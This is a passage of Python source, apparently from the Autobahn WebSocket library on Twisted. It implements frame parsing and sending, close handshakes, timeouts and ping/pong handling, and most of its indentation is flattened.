self.remoteCloseReason = reasonRaw
## reserved close codes: 0-999, 1004, 1005, 1006, 1011-2999, >= 5000
##
if code is not None and (code < 1000 or (code >= 1000 and code <= 2999 and code not in WebSocketProtocol.CLOSE_STATUS_CODES_ALLOWED) or code >= 5000):
if self.protocolViolation("invalid close code %d" % code):
return True
## closing reason
##
if reasonRaw is not None:
## we use our own UTF-8 validator to get consistent and fully conformant
## UTF-8 validation behavior
u = Utf8Validator()
val = u.validate(reasonRaw)
if not val[0]:
if self.invalidPayload("invalid close reason (non-UTF-8 payload)"):
return True
if self.state == WebSocketProtocol.STATE_CLOSING:
## We already initiated the closing handshake, so this
## is the peer's reply to our close frame.
self.wasClean = True
if self.isServer:
## When we are a server, we immediately drop the TCP.
self.dropConnection(abort = True)
else:
## When we are a client, the server should drop the TCP
## If that doesn't happen, we do. And that will set wasClean = False.
reactor.callLater(self.serverConnectionDropTimeout, self.onServerConnectionDropTimeout)
elif self.state == WebSocketProtocol.STATE_OPEN:
## The peer initiates a closing handshake, so we reply
## by sending close frame.
self.wasClean = True
if self.websocket_version == 0:
self.sendCloseFrame(isReply = True)
else:
## Either reply with same code/reason, or code == NORMAL/reason=None
if self.echoCloseCodeReason:
               self.sendCloseFrame(code = code, reasonUtf8 = reasonRaw, isReply = True)
else:
self.sendCloseFrame(code = WebSocketProtocol.CLOSE_STATUS_CODE_NORMAL, isReply = True)
if self.isServer:
## When we are a server, we immediately drop the TCP.
self.dropConnection(abort = False)
else:
## When we are a client, we expect the server to drop the TCP,
## and when the server fails to do so, a timeout in sendCloseFrame()
## will set wasClean = False back again.
pass
else:
## STATE_CONNECTING, STATE_CLOSED
raise Exception("logic error")
def onServerConnectionDropTimeout(self):
"""
We (a client) expected the peer (a server) to drop the connection,
but it didn't (in time self.serverConnectionDropTimeout).
So we drop the connection, but set self.wasClean = False.
Modes: Hybi, Hixie
"""
if self.state != WebSocketProtocol.STATE_CLOSED:
if self.debugCodePaths:
log.msg("onServerConnectionDropTimeout")
self.wasClean = False
self.wasNotCleanReason = "server did not drop TCP connection (in time)"
self.wasServerConnectionDropTimeout = True
self.dropConnection(abort = True)
else:
if self.debugCodePaths:
log.msg("skipping onServerConnectionDropTimeout since connection is already closed")
def onOpenHandshakeTimeout(self):
"""
      We expected the peer to complete the opening handshake with us.
It didn't do so (in time self.openHandshakeTimeout).
So we drop the connection, but set self.wasClean = False.
Modes: Hybi, Hixie
"""
if self.state == WebSocketProtocol.STATE_CONNECTING:
if self.debugCodePaths:
log.msg("onOpenHandshakeTimeout fired")
self.wasClean = False
self.wasNotCleanReason = "peer did not finish (in time) the opening handshake"
self.wasOpenHandshakeTimeout = True
self.dropConnection(abort = True)
elif self.state == WebSocketProtocol.STATE_OPEN:
if self.debugCodePaths:
log.msg("skipping onOpenHandshakeTimeout since WebSocket connection is open (opening handshake already finished)")
elif self.state == WebSocketProtocol.STATE_CLOSING:
if self.debugCodePaths:
log.msg("skipping onOpenHandshakeTimeout since WebSocket connection is closing")
elif self.state == WebSocketProtocol.STATE_CLOSED:
if self.debugCodePaths:
log.msg("skipping onOpenHandshakeTimeout since WebSocket connection already closed")
else:
# should not arrive here
raise Exception("logic error")
def onCloseHandshakeTimeout(self):
"""
We expected the peer to respond to us initiating a close handshake. It didn't
respond (in time self.closeHandshakeTimeout) with a close response frame though.
So we drop the connection, but set self.wasClean = False.
Modes: Hybi, Hixie
"""
if self.state != WebSocketProtocol.STATE_CLOSED:
if self.debugCodePaths:
log.msg("onCloseHandshakeTimeout fired")
self.wasClean = False
self.wasNotCleanReason = "peer did not respond (in time) in closing handshake"
self.wasCloseHandshakeTimeout = True
self.dropConnection(abort = True)
else:
if self.debugCodePaths:
log.msg("skipping onCloseHandshakeTimeout since connection is already closed")
def dropConnection(self, abort = False):
"""
Drop the underlying TCP connection. For abort parameter, see:
* http://twistedmatrix.com/documents/current/core/howto/servers.html#auto2
* https://github.com/tavendo/AutobahnPython/issues/96
Modes: Hybi, Hixie
"""
if self.state != WebSocketProtocol.STATE_CLOSED:
if self.debugCodePaths:
log.msg("dropping connection")
self.droppedByMe = True
self.state = WebSocketProtocol.STATE_CLOSED
         if abort:
self.transport.abortConnection()
else:
self.transport.loseConnection()
else:
if self.debugCodePaths:
log.msg("skipping dropConnection since connection is already closed")
def failConnection(self, code = CLOSE_STATUS_CODE_GOING_AWAY, reason = "Going Away"):
"""
Fails the WebSockets connection.
Modes: Hybi, Hixie
Notes:
- For Hixie mode, the code and reason are silently ignored.
"""
if self.state != WebSocketProtocol.STATE_CLOSED:
if self.debugCodePaths:
log.msg("Failing connection : %s - %s" % (code, reason))
self.failedByMe = True
if self.failByDrop:
## brutally drop the TCP connection
self.wasClean = False
self.wasNotCleanReason = "I failed the WebSocket connection by dropping the TCP connection"
self.dropConnection(abort = True)
else:
## perform WebSockets closing handshake
if self.state != WebSocketProtocol.STATE_CLOSING:
self.sendCloseFrame(code = code, reasonUtf8 = reason.encode("UTF-8"), isReply = False)
else:
if self.debugCodePaths:
log.msg("skipping failConnection since connection is already closing")
else:
if self.debugCodePaths:
log.msg("skipping failConnection since connection is already closed")
def protocolViolation(self, reason):
"""
Fired when a WebSockets protocol violation/error occurs.
Modes: Hybi, Hixie
Notes:
- For Hixie mode, reason is silently ignored.
:param reason: Protocol violation that was encountered (human readable).
:type reason: str
:returns: bool -- True, when any further processing should be discontinued.
"""
if self.debugCodePaths:
log.msg("Protocol violation : %s" % reason)
self.failConnection(WebSocketProtocol.CLOSE_STATUS_CODE_PROTOCOL_ERROR, reason)
if self.failByDrop:
return True
else:
## if we don't immediately drop the TCP, we need to skip the invalid frame
## to continue to later receive the closing handshake reply
return False
def invalidPayload(self, reason):
"""
Fired when invalid payload is encountered. Currently, this only happens
for text message when payload is invalid UTF-8 or close frames with
close reason that is invalid UTF-8.
Modes: Hybi, Hixie
Notes:
- For Hixie mode, reason is silently ignored.
:param reason: What was invalid for the payload (human readable).
:type reason: str
:returns: bool -- True, when any further processing should be discontinued.
"""
if self.debugCodePaths:
log.msg("Invalid payload : %s" % reason)
self.failConnection(WebSocketProtocol.CLOSE_STATUS_CODE_INVALID_PAYLOAD, reason)
if self.failByDrop:
return True
else:
## if we don't immediately drop the TCP, we need to skip the invalid frame
## to continue to later receive the closing handshake reply
return False
def connectionMade(self):
"""
This is called by Twisted framework when a new TCP connection has been established
and handed over to a Protocol instance (an instance of this class).
Modes: Hybi, Hixie
"""
      ## copy default options from factory (so we are not affected by changes on those)
##
self.debug = self.factory.debug
self.debugCodePaths = self.factory.debugCodePaths
self.logOctets = self.factory.logOctets
self.logFrames = self.factory.logFrames
self.allowHixie76 = self.factory.allowHixie76
self.utf8validateIncoming = self.factory.utf8validateIncoming
self.applyMask = self.factory.applyMask
self.maxFramePayloadSize = self.factory.maxFramePayloadSize
self.maxMessagePayloadSize = self.factory.maxMessagePayloadSize
self.autoFragmentSize = self.factory.autoFragmentSize
self.failByDrop = self.factory.failByDrop
self.echoCloseCodeReason = self.factory.echoCloseCodeReason
self.openHandshakeTimeout = self.factory.openHandshakeTimeout
self.closeHandshakeTimeout = self.factory.closeHandshakeTimeout
self.tcpNoDelay = self.factory.tcpNoDelay
if self.isServer:
self.versions = self.factory.versions
self.webStatus = self.factory.webStatus
self.requireMaskedClientFrames = self.factory.requireMaskedClientFrames
self.maskServerFrames = self.factory.maskServerFrames
else:
self.version = self.factory.version
self.acceptMaskedServerFrames = self.factory.acceptMaskedServerFrames
self.maskClientFrames = self.factory.maskClientFrames
self.serverConnectionDropTimeout = self.factory.serverConnectionDropTimeout
## Set "Nagle"
self.transport.setTcpNoDelay(self.tcpNoDelay)
## the peer we are connected to
self.peer = self.transport.getPeer()
self.peerstr = "%s:%d" % (self.peer.host, self.peer.port)
## initial state
self.state = WebSocketProtocol.STATE_CONNECTING
self.send_state = WebSocketProtocol.SEND_STATE_GROUND
self.data = ""
## for chopped/synched sends, we need to queue to maintain
## ordering when recalling the reactor to actually "force"
## the octets to wire (see test/trickling in the repo)
self.send_queue = deque()
self.triggered = False
## incremental UTF8 validator
self.utf8validator = Utf8Validator()
## track when frame/message payload sizes (incoming) were exceeded
self.wasMaxFramePayloadSizeExceeded = False
self.wasMaxMessagePayloadSizeExceeded = False
## the following vars are related to connection close handling/tracking
# True, iff I have initiated closing HS (that is, did send close first)
self.closedByMe = False
# True, iff I have failed the WS connection (i.e. due to protocol error)
# Failing can be either by initiating close HS or brutal drop (this is
# controlled by failByDrop option)
self.failedByMe = False
# True, iff I dropped the TCP connection (called transport.loseConnection())
self.droppedByMe = False
# True, iff full WebSockets closing handshake was performed (close frame sent
# and received) _and_ the server dropped the TCP (which is its responsibility)
self.wasClean = False
# When self.wasClean = False, the reason (what happened)
self.wasNotCleanReason = None
# When we are a client, and we expected the server to drop the TCP, but that
# didn't happen in time, this gets True
self.wasServerConnectionDropTimeout = False
# When the initial WebSocket opening handshake times out, this gets True
self.wasOpenHandshakeTimeout = False
# When we initiated a closing handshake, but the peer did not respond in
# time, this gets True
self.wasCloseHandshakeTimeout = False
# The close code I sent in close frame (if any)
self.localCloseCode = None
# The close reason I sent in close frame (if any)
self.localCloseReason = None
# The close code the peer sent me in close frame (if any)
self.remoteCloseCode = None
# The close reason the peer sent me in close frame (if any)
self.remoteCloseReason = None
# set opening handshake timeout handler
if self.openHandshakeTimeout > 0:
reactor.callLater(self.openHandshakeTimeout, self.onOpenHandshakeTimeout)
def connectionLost(self, reason):
"""
This is called by Twisted framework when a TCP connection was lost.
Modes: Hybi, Hixie
"""
self.state = WebSocketProtocol.STATE_CLOSED
if not self.wasClean:
if not self.droppedByMe and self.wasNotCleanReason is None:
self.wasNotCleanReason = "peer dropped the TCP connection without previous WebSocket closing handshake"
self.onClose(self.wasClean, WebSocketProtocol.CLOSE_STATUS_CODE_ABNORMAL_CLOSE, "connection was closed uncleanly (%s)" % self.wasNotCleanReason)
else:
self.onClose(self.wasClean, self.remoteCloseCode, self.remoteCloseReason)
def logRxOctets(self, data):
"""
Hook fired right after raw octets have been received, but only when self.logOctets == True.
Modes: Hybi, Hixie
"""
log.msg("RX Octets from %s : octets = %s" % (self.peerstr, binascii.b2a_hex(data)))
def logTxOctets(self, data, sync):
"""
Hook fired right after raw octets have been sent, but only when self.logOctets == True.
Modes: Hybi, Hixie
"""
log.msg("TX Octets to %s : sync = %s, octets = %s" % (self.peerstr, sync, binascii.b2a_hex(data)))
def logRxFrame(self, frameHeader, payload):
"""
Hook fired right after WebSocket frame has been received and decoded, but only when self.logFrames == True.
Modes: Hybi
"""
data = ''.join(payload)
info = (self.peerstr,
frameHeader.fin,
frameHeader.rsv,
frameHeader.opcode,
binascii.b2a_hex(frameHeader.mask) if frameHeader.mask else "-",
frameHeader.length,
data if frameHeader.opcode == 1 else binascii.b2a_hex(data))
log.msg("RX Frame from %s : fin = %s, rsv = %s, opcode = %s, mask = %s, length = %s, payload = %s" % info)
def logTxFrame(self, frameHeader, payload, repeatLength, chopsize, sync):
"""
Hook fired right after WebSocket frame has been encoded and sent, but only when self.logFrames == True.
Modes: Hybi
"""
info = (self.peerstr,
frameHeader.fin,
frameHeader.rsv,
frameHeader.opcode,
binascii.b2a_hex(frameHeader.mask) if frameHeader.mask else "-",
frameHeader.length,
repeatLength,
chopsize,
sync,
payload if frameHeader.opcode == 1 else binascii.b2a_hex(payload))
log.msg("TX Frame to %s : fin = %s, rsv = %s, opcode = %s, mask = %s, length = %s, repeat_length = %s, chopsize = %s, sync = %s, payload = %s" % info)
def dataReceived(self, data):
"""
This is called by Twisted framework upon receiving data on TCP connection.
Modes: Hybi, Hixie
"""
if self.logOctets:
self.logRxOctets(data)
self.data += data
self.consumeData()
def consumeData(self):
"""
Consume buffered (incoming) data.
Modes: Hybi, Hixie
"""
## WebSocket is open (handshake was completed) or close was sent
##
if self.state == WebSocketProtocol.STATE_OPEN or self.state == WebSocketProtocol.STATE_CLOSING:
## process until no more buffered data left or WS was closed
##
while self.processData() and self.state != WebSocketProtocol.STATE_CLOSED:
pass
## WebSocket needs handshake
##
elif self.state == WebSocketProtocol.STATE_CONNECTING:
## the implementation of processHandshake() in derived
## class needs to perform client or server handshake
## from other party here ..
##
self.processHandshake()
## we failed the connection .. don't process any more data!
##
elif self.state == WebSocketProtocol.STATE_CLOSED:
## ignore any data received after WS was closed
##
if self.debugCodePaths:
log.msg("received data in STATE_CLOSED")
## should not arrive here (invalid state)
##
else:
raise Exception("invalid state")
def processHandshake(self):
"""
Process WebSockets handshake.
Modes: Hybi, Hixie
"""
raise Exception("must implement handshake (client or server) in derived class")
def registerProducer(self, producer, streaming):
"""
Register a Twisted producer with this protocol.
Modes: Hybi, Hixie
:param producer: A Twisted push or pull producer.
:type producer: object
:param streaming: Producer type.
:type streaming: bool
"""
self.transport.registerProducer(producer, streaming)
def _trigger(self):
"""
Trigger sending stuff from send queue (which is only used for chopped/synched writes).
Modes: Hybi, Hixie
"""
if not self.triggered:
self.triggered = True
self._send()
def _send(self):
"""
Send out stuff from send queue. For details how this works, see test/trickling
in the repo.
Modes: Hybi, Hixie
"""
if len(self.send_queue) > 0:
e = self.send_queue.popleft()
if self.state != WebSocketProtocol.STATE_CLOSED:
self.transport.write(e[0])
if self.logOctets:
self.logTxOctets(e[0], e[1])
else:
if self.debugCodePaths:
log.msg("skipped delayed write, since connection is closed")
# we need to reenter the reactor to make the latter
# reenter the OS network stack, so that octets
# can get on the wire. Note: this is a "heuristic",
# since there is no (easy) way to really force out
# octets from the OS network stack to wire.
reactor.callLater(WebSocketProtocol.QUEUED_WRITE_DELAY, self._send)
else:
self.triggered = False
def sendData(self, data, sync = False, chopsize = None):
"""
Wrapper for self.transport.write which allows to give a chopsize.
When asked to chop up writing to TCP stream, we write only chopsize octets
and then give up control to select() in underlying reactor so that bytes
get onto wire immediately. Note that this is different from and unrelated
to WebSockets data message fragmentation. Note that this is also different
from the TcpNoDelay option which can be set on the socket.
Modes: Hybi, Hixie
"""
if chopsize and chopsize > 0:
i = 0
n = len(data)
done = False
while not done:
j = i + chopsize
if j >= n:
done = True
j = n
self.send_queue.append((data[i:j], True))
i += chopsize
self._trigger()
else:
if sync or len(self.send_queue) > 0:
self.send_queue.append((data, sync))
self._trigger()
else:
self.transport.write(data)
if self.logOctets:
self.logTxOctets(data, False)
def sendPreparedMessage(self, preparedMsg):
"""
Send a message that was previously prepared with
WebSocketFactory.prepareMessage().
Modes: Hybi, Hixie
"""
if self.websocket_version == 0:
self.sendData(preparedMsg.payloadHixie)
else:
self.sendData(preparedMsg.payloadHybi)
def processData(self):
"""
After WebSockets handshake has been completed, this procedure will do all
subsequent processing of incoming bytes.
Modes: Hybi, Hixie
"""
if self.websocket_version == 0:
return self.processDataHixie76()
else:
return self.processDataHybi()
def processDataHixie76(self):
"""
Hixie-76 incoming data processing.
Modes: Hixie
"""
buffered_len = len(self.data)
## outside a message, that is we are awaiting data which starts a new message
##
if not self.inside_message:
if buffered_len >= 2:
## new message
##
if self.data[0] == '\x00':
self.inside_message = True
if self.utf8validateIncoming:
self.utf8validator.reset()
self.utf8validateIncomingCurrentMessage = True
self.utf8validateLast = (True, True, 0, 0)
else:
self.utf8validateIncomingCurrentMessage = False
self.data = self.data[1:]
self.onMessageBegin(1)
## Hixie close from peer received
##
elif self.data[0] == '\xff' and self.data[1] == '\x00':
               self.onCloseFrame(None, None)
self.data = self.data[2:]
# stop receiving/processing after having received close!
return False
## malformed data
##
else:
if self.protocolViolation("malformed data received"):
return False
else:
## need more data
return False
end_index = self.data.find('\xff')
if end_index > 0:
payload = self.data[:end_index]
self.data = self.data[end_index + 1:]
else:
payload = self.data
self.data = ''
## incrementally validate UTF-8 payload
##
if self.utf8validateIncomingCurrentMessage:
self.utf8validateLast = self.utf8validator.validate(payload)
if not self.utf8validateLast[0]:
if self.invalidPayload("encountered invalid UTF-8 while processing text message at payload octet index %d" % self.utf8validateLast[3]):
return False
self.onMessageFrameData(payload)
if end_index > 0:
self.inside_message = False
self.onMessageEnd()
return len(self.data) > 0
def processDataHybi(self):
"""
RFC6455/Hybi-Drafts incoming data processing.
Modes: Hybi
"""
buffered_len = len(self.data)
## outside a frame, that is we are awaiting data which starts a new frame
##
if self.current_frame is None:
         ## need a minimum of 2 octets for a new frame
##
if buffered_len >= 2:
## FIN, RSV, OPCODE
##
b = ord(self.data[0])
frame_fin = (b & 0x80) != 0
frame_rsv = (b & 0x70) >> 4
frame_opcode = b & 0x0f
## MASK, PAYLOAD LEN 1
##
b = ord(self.data[1])
frame_masked = (b & 0x80) != 0
frame_payload_len1 = b & 0x7f
## MUST be 0 when no extension defining
## the semantics of RSV has been negotiated
##
if frame_rsv != 0:
if self.protocolViolation("RSV != 0 and no extension negotiated"):
return False
## all client-to-server frames MUST be masked
##
if self.isServer and self.requireMaskedClientFrames and not frame_masked:
if self.protocolViolation("unmasked client-to-server frame"):
return False
## all server-to-client frames MUST NOT be masked
##
if not self.isServer and not self.acceptMaskedServerFrames and frame_masked:
if self.protocolViolation("masked server-to-client frame"):
return False
## check frame
##
if frame_opcode > 7: # control frame (have MSB in opcode set)
## control frames MUST NOT be fragmented
##
if not frame_fin:
if self.protocolViolation("fragmented control frame"):
return False
## control frames MUST have payload 125 octets or less
##
if frame_payload_len1 > 125:
if self.protocolViolation("control frame with payload length > 125 octets"):
return False
## check for reserved control frame opcodes
##
if frame_opcode not in [8, 9, 10]:
if self.protocolViolation("control frame using reserved opcode %d" % frame_opcode):
return False
## close frame : if there is a body, the first two bytes of the body MUST be a 2-byte
## unsigned integer (in network byte order) representing a status code
##
if frame_opcode == 8 and frame_payload_len1 == 1:
if self.protocolViolation("received close control frame with payload len 1"):
return False
else: # data frame
## check for reserved data frame opcodes
##
if frame_opcode not in [0, 1, 2]:
if self.protocolViolation("data frame using reserved opcode %d" % frame_opcode):
return False
## check opcode vs message fragmentation state 1/2
##
if not self.inside_message and frame_opcode == 0:
if self.protocolViolation("received continuation data frame outside fragmented message"):
return False
## check opcode vs message fragmentation state 2/2
##
if self.inside_message and frame_opcode != 0:
if self.protocolViolation("received non-continuation data frame while inside fragmented message"):
return False
## compute complete header length
##
if frame_masked:
mask_len = 4
else:
mask_len = 0
if frame_payload_len1 < 126:
frame_header_len = 2 + mask_len
elif frame_payload_len1 == 126:
frame_header_len = 2 + 2 + mask_len
elif frame_payload_len1 == 127:
frame_header_len = 2 + 8 + mask_len
else:
raise Exception("logic error")
## only proceed when we have enough data buffered for complete
## frame header (which includes extended payload len + mask)
##
if buffered_len >= frame_header_len:
## minimum frame header length (already consumed)
##
i = 2
## extract extended payload length
##
if frame_payload_len1 == 126:
frame_payload_len = struct.unpack("!H", self.data[i:i+2])[0]
if frame_payload_len < 126:
if self.protocolViolation("invalid data frame length (not using minimal length encoding)"):
return False
i += 2
elif frame_payload_len1 == 127:
frame_payload_len = struct.unpack("!Q", self.data[i:i+8])[0]
if frame_payload_len > 0x7FFFFFFFFFFFFFFF: # 2**63
if self.protocolViolation("invalid data frame length (>2^63)"):
return False
if frame_payload_len < 65536:
if self.protocolViolation("invalid data frame length (not using minimal length encoding)"):
return False
i += 8
else:
frame_payload_len = frame_payload_len1
## when payload is masked, extract frame mask
##
frame_mask = None
if frame_masked:
frame_mask = self.data[i:i+4]
i += 4
if frame_masked and frame_payload_len > 0 and self.applyMask:
if frame_payload_len < WebSocketProtocol.PAYLOAD_LEN_XOR_BREAKEVEN:
self.current_frame_masker = XorMaskerSimple(frame_mask)
else:
self.current_frame_masker = XorMaskerShifted1(frame_mask)
else:
self.current_frame_masker = XorMaskerNull()
## remember rest (payload of current frame after header and everything thereafter)
##
self.data = self.data[i:]
## ok, got complete frame header
##
self.current_frame = FrameHeader(frame_opcode,
frame_fin,
frame_rsv,
frame_payload_len,
frame_mask)
## process begin on new frame
##
self.onFrameBegin()
               ## reprocess when frame has no payload or there is still buffered data left
##
return frame_payload_len == 0 or len(self.data) > 0
else:
return False # need more data
else:
return False # need more data
## inside a started frame
##
else:
## cut out rest of frame payload
##
rest = self.current_frame.length - self.current_frame_masker.pointer()
if buffered_len >= rest:
data = self.data[:rest]
length = rest
self.data = self.data[rest:]
else:
data = self.data
length = buffered_len
self.data = ""
if length > 0:
## unmask payload
##
payload = self.current_frame_masker.process(data)
## process frame data
##
fr = self.onFrameData(payload)
if fr == False:
return False
## fire frame end handler when frame payload is complete
##
if self.current_frame_masker.pointer() == self.current_frame.length:
fr = self.onFrameEnd()
if fr == False:
return False
## reprocess when no error occurred and buffered data left
##
return len(self.data) > 0
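   ## Example (illustrative sketch): the bit layout of the two fixed header
   ## octets which processDataHybi() above starts from, for a final, unmasked
   ## text frame with a 5 octet payload such as "Hello":
   ##
   ##    b0 = 0x81  ->  frame_fin = (b0 & 0x80) != 0       # True
   ##                   frame_rsv = (b0 & 0x70) >> 4       # 0
   ##                   frame_opcode = b0 & 0x0f           # 1 (text)
   ##    b1 = 0x05  ->  frame_masked = (b1 & 0x80) != 0    # False
   ##                   frame_payload_len1 = b1 & 0x7f     # 5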
def onFrameBegin(self):
"""
Begin of receive new frame.
Modes: Hybi
"""
if self.current_frame.opcode > 7:
self.control_frame_data = []
else:
## new message started
##
if not self.inside_message:
self.inside_message = True
if self.current_frame.opcode == WebSocketProtocol.MESSAGE_TYPE_TEXT and self.utf8validateIncoming:
self.utf8validator.reset()
self.utf8validateIncomingCurrentMessage = True
self.utf8validateLast = (True, True, 0, 0)
else:
self.utf8validateIncomingCurrentMessage = False
self.onMessageBegin(self.current_frame.opcode)
self.onMessageFrameBegin(self.current_frame.length, self.current_frame.rsv)
def onFrameData(self, payload):
"""
New data received within frame.
Modes: Hybi
"""
if self.current_frame.opcode > 7:
self.control_frame_data.append(payload)
else:
## incrementally validate UTF-8 payload
##
if self.utf8validateIncomingCurrentMessage:
self.utf8validateLast = self.utf8validator.validate(payload)
if not self.utf8validateLast[0]:
if self.invalidPayload("encountered invalid UTF-8 while processing text message at payload octet index %d" % self.utf8validateLast[3]):
return False
self.onMessageFrameData(payload)
def onFrameEnd(self):
"""
End of frame received.
Modes: Hybi
"""
if self.current_frame.opcode > 7:
if self.logFrames:
self.logRxFrame(self.current_frame, self.control_frame_data)
self.processControlFrame()
else:
if self.logFrames:
self.logRxFrame(self.current_frame, self.frame_data)
self.onMessageFrameEnd()
if self.current_frame.fin:
if self.utf8validateIncomingCurrentMessage:
if not self.utf8validateLast[1]:
if self.invalidPayload("UTF-8 text message payload ended within Unicode code point at payload octet index %d" % self.utf8validateLast[3]):
return False
self.onMessageEnd()
self.inside_message = False
self.current_frame = None
def processControlFrame(self):
"""
Process a completely received control frame.
Modes: Hybi
"""
payload = ''.join(self.control_frame_data)
self.control_frame_data = None
## CLOSE frame
##
if self.current_frame.opcode == 8:
code = None
reasonRaw = None
ll = len(payload)
if ll > 1:
code = struct.unpack("!H", payload[0:2])[0]
if ll > 2:
reasonRaw = payload[2:]
if self.onCloseFrame(code, reasonRaw):
return False
## PING frame
##
elif self.current_frame.opcode == 9:
self.onPing(payload)
## PONG frame
##
elif self.current_frame.opcode == 10:
self.onPong(payload)
else:
## we might arrive here, when protocolViolation
## wants us to continue anyway
pass
return True
def sendFrame(self, opcode, payload = "", fin = True, rsv = 0, mask = None, payload_len = None, chopsize = None, sync = False):
"""
Send out frame. Normally only used internally via sendMessage(), sendPing(), sendPong() and sendClose().
This method deliberately allows to send invalid frames (that is frames invalid
per-se, or frames invalid because of protocol state). Other than in fuzzing servers,
calling methods will ensure that no invalid frames are sent.
In addition, this method supports explicit specification of payload length.
When payload_len is given, it will always write that many octets to the stream.
      It'll wrap within payload, resending parts of that when more octets were requested.
      The use case is again for fuzzing servers which want to send increasing amounts
      of payload data to peers without having to construct potentially large messages
      themselves.
Modes: Hybi
"""
if self.websocket_version == 0:
raise Exception("function not supported in Hixie-76 mode")
if payload_len is not None:
if len(payload) < 1:
raise Exception("cannot construct repeated payload with length %d from payload of length %d" % (payload_len, len(payload)))
l = payload_len
pl = ''.join([payload for k in range(payload_len / len(payload))]) + payload[:payload_len % len(payload)]
else:
l = len(payload)
pl = payload
## first byte
##
b0 = 0
if fin:
b0 |= (1 << 7)
b0 |= (rsv % 8) << 4
b0 |= opcode % 128
## second byte, payload len bytes and mask
##
b1 = 0
if mask or (not self.isServer and self.maskClientFrames) or (self.isServer and self.maskServerFrames):
b1 |= 1 << 7
if not mask:
mask = struct.pack("!I", random.getrandbits(32))
mv = mask
else:
mv = ""
## mask frame payload
##
if l > 0 and self.applyMask:
if l < WebSocketProtocol.PAYLOAD_LEN_XOR_BREAKEVEN:
masker = XorMaskerSimple(mask)
else:
masker = XorMaskerShifted1(mask)
plm = masker.process(pl)
else:
plm = pl
else:
mv = ""
plm = pl
el = ""
if l <= 125:
b1 |= l
elif l <= 0xFFFF:
b1 |= 126
el = struct.pack("!H", l)
elif l <= 0x7FFFFFFFFFFFFFFF:
b1 |= 127
el = struct.pack("!Q", l)
else:
raise Exception("invalid payload length")
raw = ''.join([chr(b0), chr(b1), el, mv, plm])
if self.logFrames:
frameHeader = FrameHeader(opcode, fin, rsv, l, mask)
self.logTxFrame(frameHeader, payload, payload_len, chopsize, sync)
## send frame octets
##
self.sendData(raw, sync, chopsize)
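   ## Example (illustrative sketch): the octets sendFrame() produces for a
   ## short, final, unmasked text frame, e.g. a server with server-to-client
   ## masking turned off sending "Hello":
   ##
   ##    b0 = (1 << 7) | (0 << 4) | 1 = 0x81    # FIN set, RSV = 0, opcode = 1
   ##    b1 = 5 = 0x05                          # no mask bit, 7-bit length
   ##    raw = "\x81\x05" + "Hello"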
def sendPing(self, payload = None):
"""
      Send out Ping to peer. A peer is expected to Pong back the payload as soon
as "practical". When more than 1 Ping is outstanding at a peer, the peer may
elect to respond only to the last Ping.
Modes: Hybi
:param payload: An optional, arbitrary payload of length < 126 octets.
:type payload: str
"""
if self.websocket_version == 0:
raise Exception("function not supported in Hixie-76 mode")
if self.state != WebSocketProtocol.STATE_OPEN:
return
if payload:
l = len(payload)
if l > 125:
raise Exception("invalid payload for PING (payload length must be <= 125, was %d)" % l)
self.sendFrame(opcode = 9, payload = payload)
else:
self.sendFrame(opcode = 9)
def sendPong(self, payload = None):
"""
Send out Pong to peer. A Pong frame MAY be sent unsolicited.
This serves as a unidirectional heartbeat. A response to an unsolicited pong is "not expected".
Modes: Hybi
:param payload: An optional, arbitrary payload of length < 126 octets.
:type payload: str
"""
if self.websocket_version == 0:
raise Exception("function not supported in Hixie-76 mode")
if self.state != WebSocketProtocol.STATE_OPEN:
return
if payload:
l = len(payload)
if l > 125:
raise Exception("invalid payload for PONG (payload length must be <= 125, was %d)" % l)
self.sendFrame(opcode = 10, payload = payload)
else:
self.sendFrame(opcode = 10)
def sendCloseFrame(self, code = None, reasonUtf8 = None, isReply = False):
"""
Send a close frame and update protocol state. Note, that this is
      an internal method which deliberately allows to send close
      frames with invalid payload.
Modes: Hybi, Hixie
Notes:
- For Hixie mode, this method is slightly misnamed for historic reasons.
- For Hixie mode, code and reasonUtf8 will be silently ignored.
"""
if self.state == WebSocketProtocol.STATE_CLOSING:
if self.debugCodePaths:
log.msg("ignoring sendCloseFrame since connection is closing")
elif self.state == WebSocketProtocol.STATE_CLOSED:
if self.debugCodePaths:
log.msg("ignoring sendCloseFrame since connection already closed")
elif self.state == WebSocketProtocol.STATE_CONNECTING:
raise Exception("cannot close a connection not yet connected")
elif self.state == WebSocketProtocol.STATE_OPEN:
if self.websocket_version == 0:
self.sendData("\xff\x00")
else:
## construct Hybi close frame payload and send frame
payload = ""
if code is not None:
payload += struct.pack("!H", code)
if reasonUtf8 is not None:
payload += reasonUtf8
self.sendFrame(opcode = 8, payload = payload)
## update state
self.state = WebSocketProtocol.STATE_CLOSING
self.closedByMe = not isReply
## remember payload of close frame we sent
self.localCloseCode = code
self.localCloseReason = reasonUtf8
## drop connection when timeout on receiving close handshake reply
if self.closedByMe:
reactor.callLater(self.closeHandshakeTimeout, self.onCloseHandshakeTimeout)
else:
raise Exception("logic error")
def sendClose(self, code = None, reason = None):
"""
Starts a closing handshake.
Modes: Hybi, Hixie
Notes:
- For Hixie mode, code and reason will be silently ignored.
:param code: An optional close status code (:class:`WebSocketProtocol`.CLOSE_STATUS_CODE_NORMAL or 3000-4999).
:type code: int
      :param reason: An optional close reason (a string; when present, a status code MUST also be present).
:type reason: str
"""
if code is not None:
if type(code) != int:
raise Exception("invalid type %s for close code" % type(code))
if code != 1000 and not (code >= 3000 and code <= 4999):
raise Exception("invalid close code %d" % code)
if reason is not None:
if code is None:
raise Exception("close reason without close code")
if type(reason) not in [str, unicode]:
raise Exception("invalid type %s for close reason" % type(reason))
reasonUtf8 = reason.encode("UTF-8")
if len(reasonUtf8) + 2 > 125:
raise Exception("close reason too long (%d)" % len(reasonUtf8))
else:
reasonUtf8 = None
self.sendCloseFrame(code = code, reasonUtf8 = reasonUtf8, isReply = False)
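   ## Example (illustrative sketch): application code initiating a clean
   ## closing handshake with a normal status code and a placeholder reason:
   ##
   ##    self.sendClose(code = WebSocketProtocol.CLOSE_STATUS_CODE_NORMAL,
   ##                   reason = u"goodbye")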
def beginMessage(self, opcode = MESSAGE_TYPE_TEXT):
"""
Begin sending new message.
Modes: Hybi, Hixie
:param opcode: Message type, normally either WebSocketProtocol.MESSAGE_TYPE_TEXT (default) or
WebSocketProtocol.MESSAGE_TYPE_BINARY (only Hybi mode).
"""
if self.state != WebSocketProtocol.STATE_OPEN:
return
## check if sending state is valid for this method
##
if self.send_state != WebSocketProtocol.SEND_STATE_GROUND:
raise Exception("WebSocketProtocol.beginMessage invalid in current sending state")
if self.websocket_version == 0:
if opcode != 1:
raise Exception("cannot send non-text message in Hixie mode")
self.sendData('\x00')
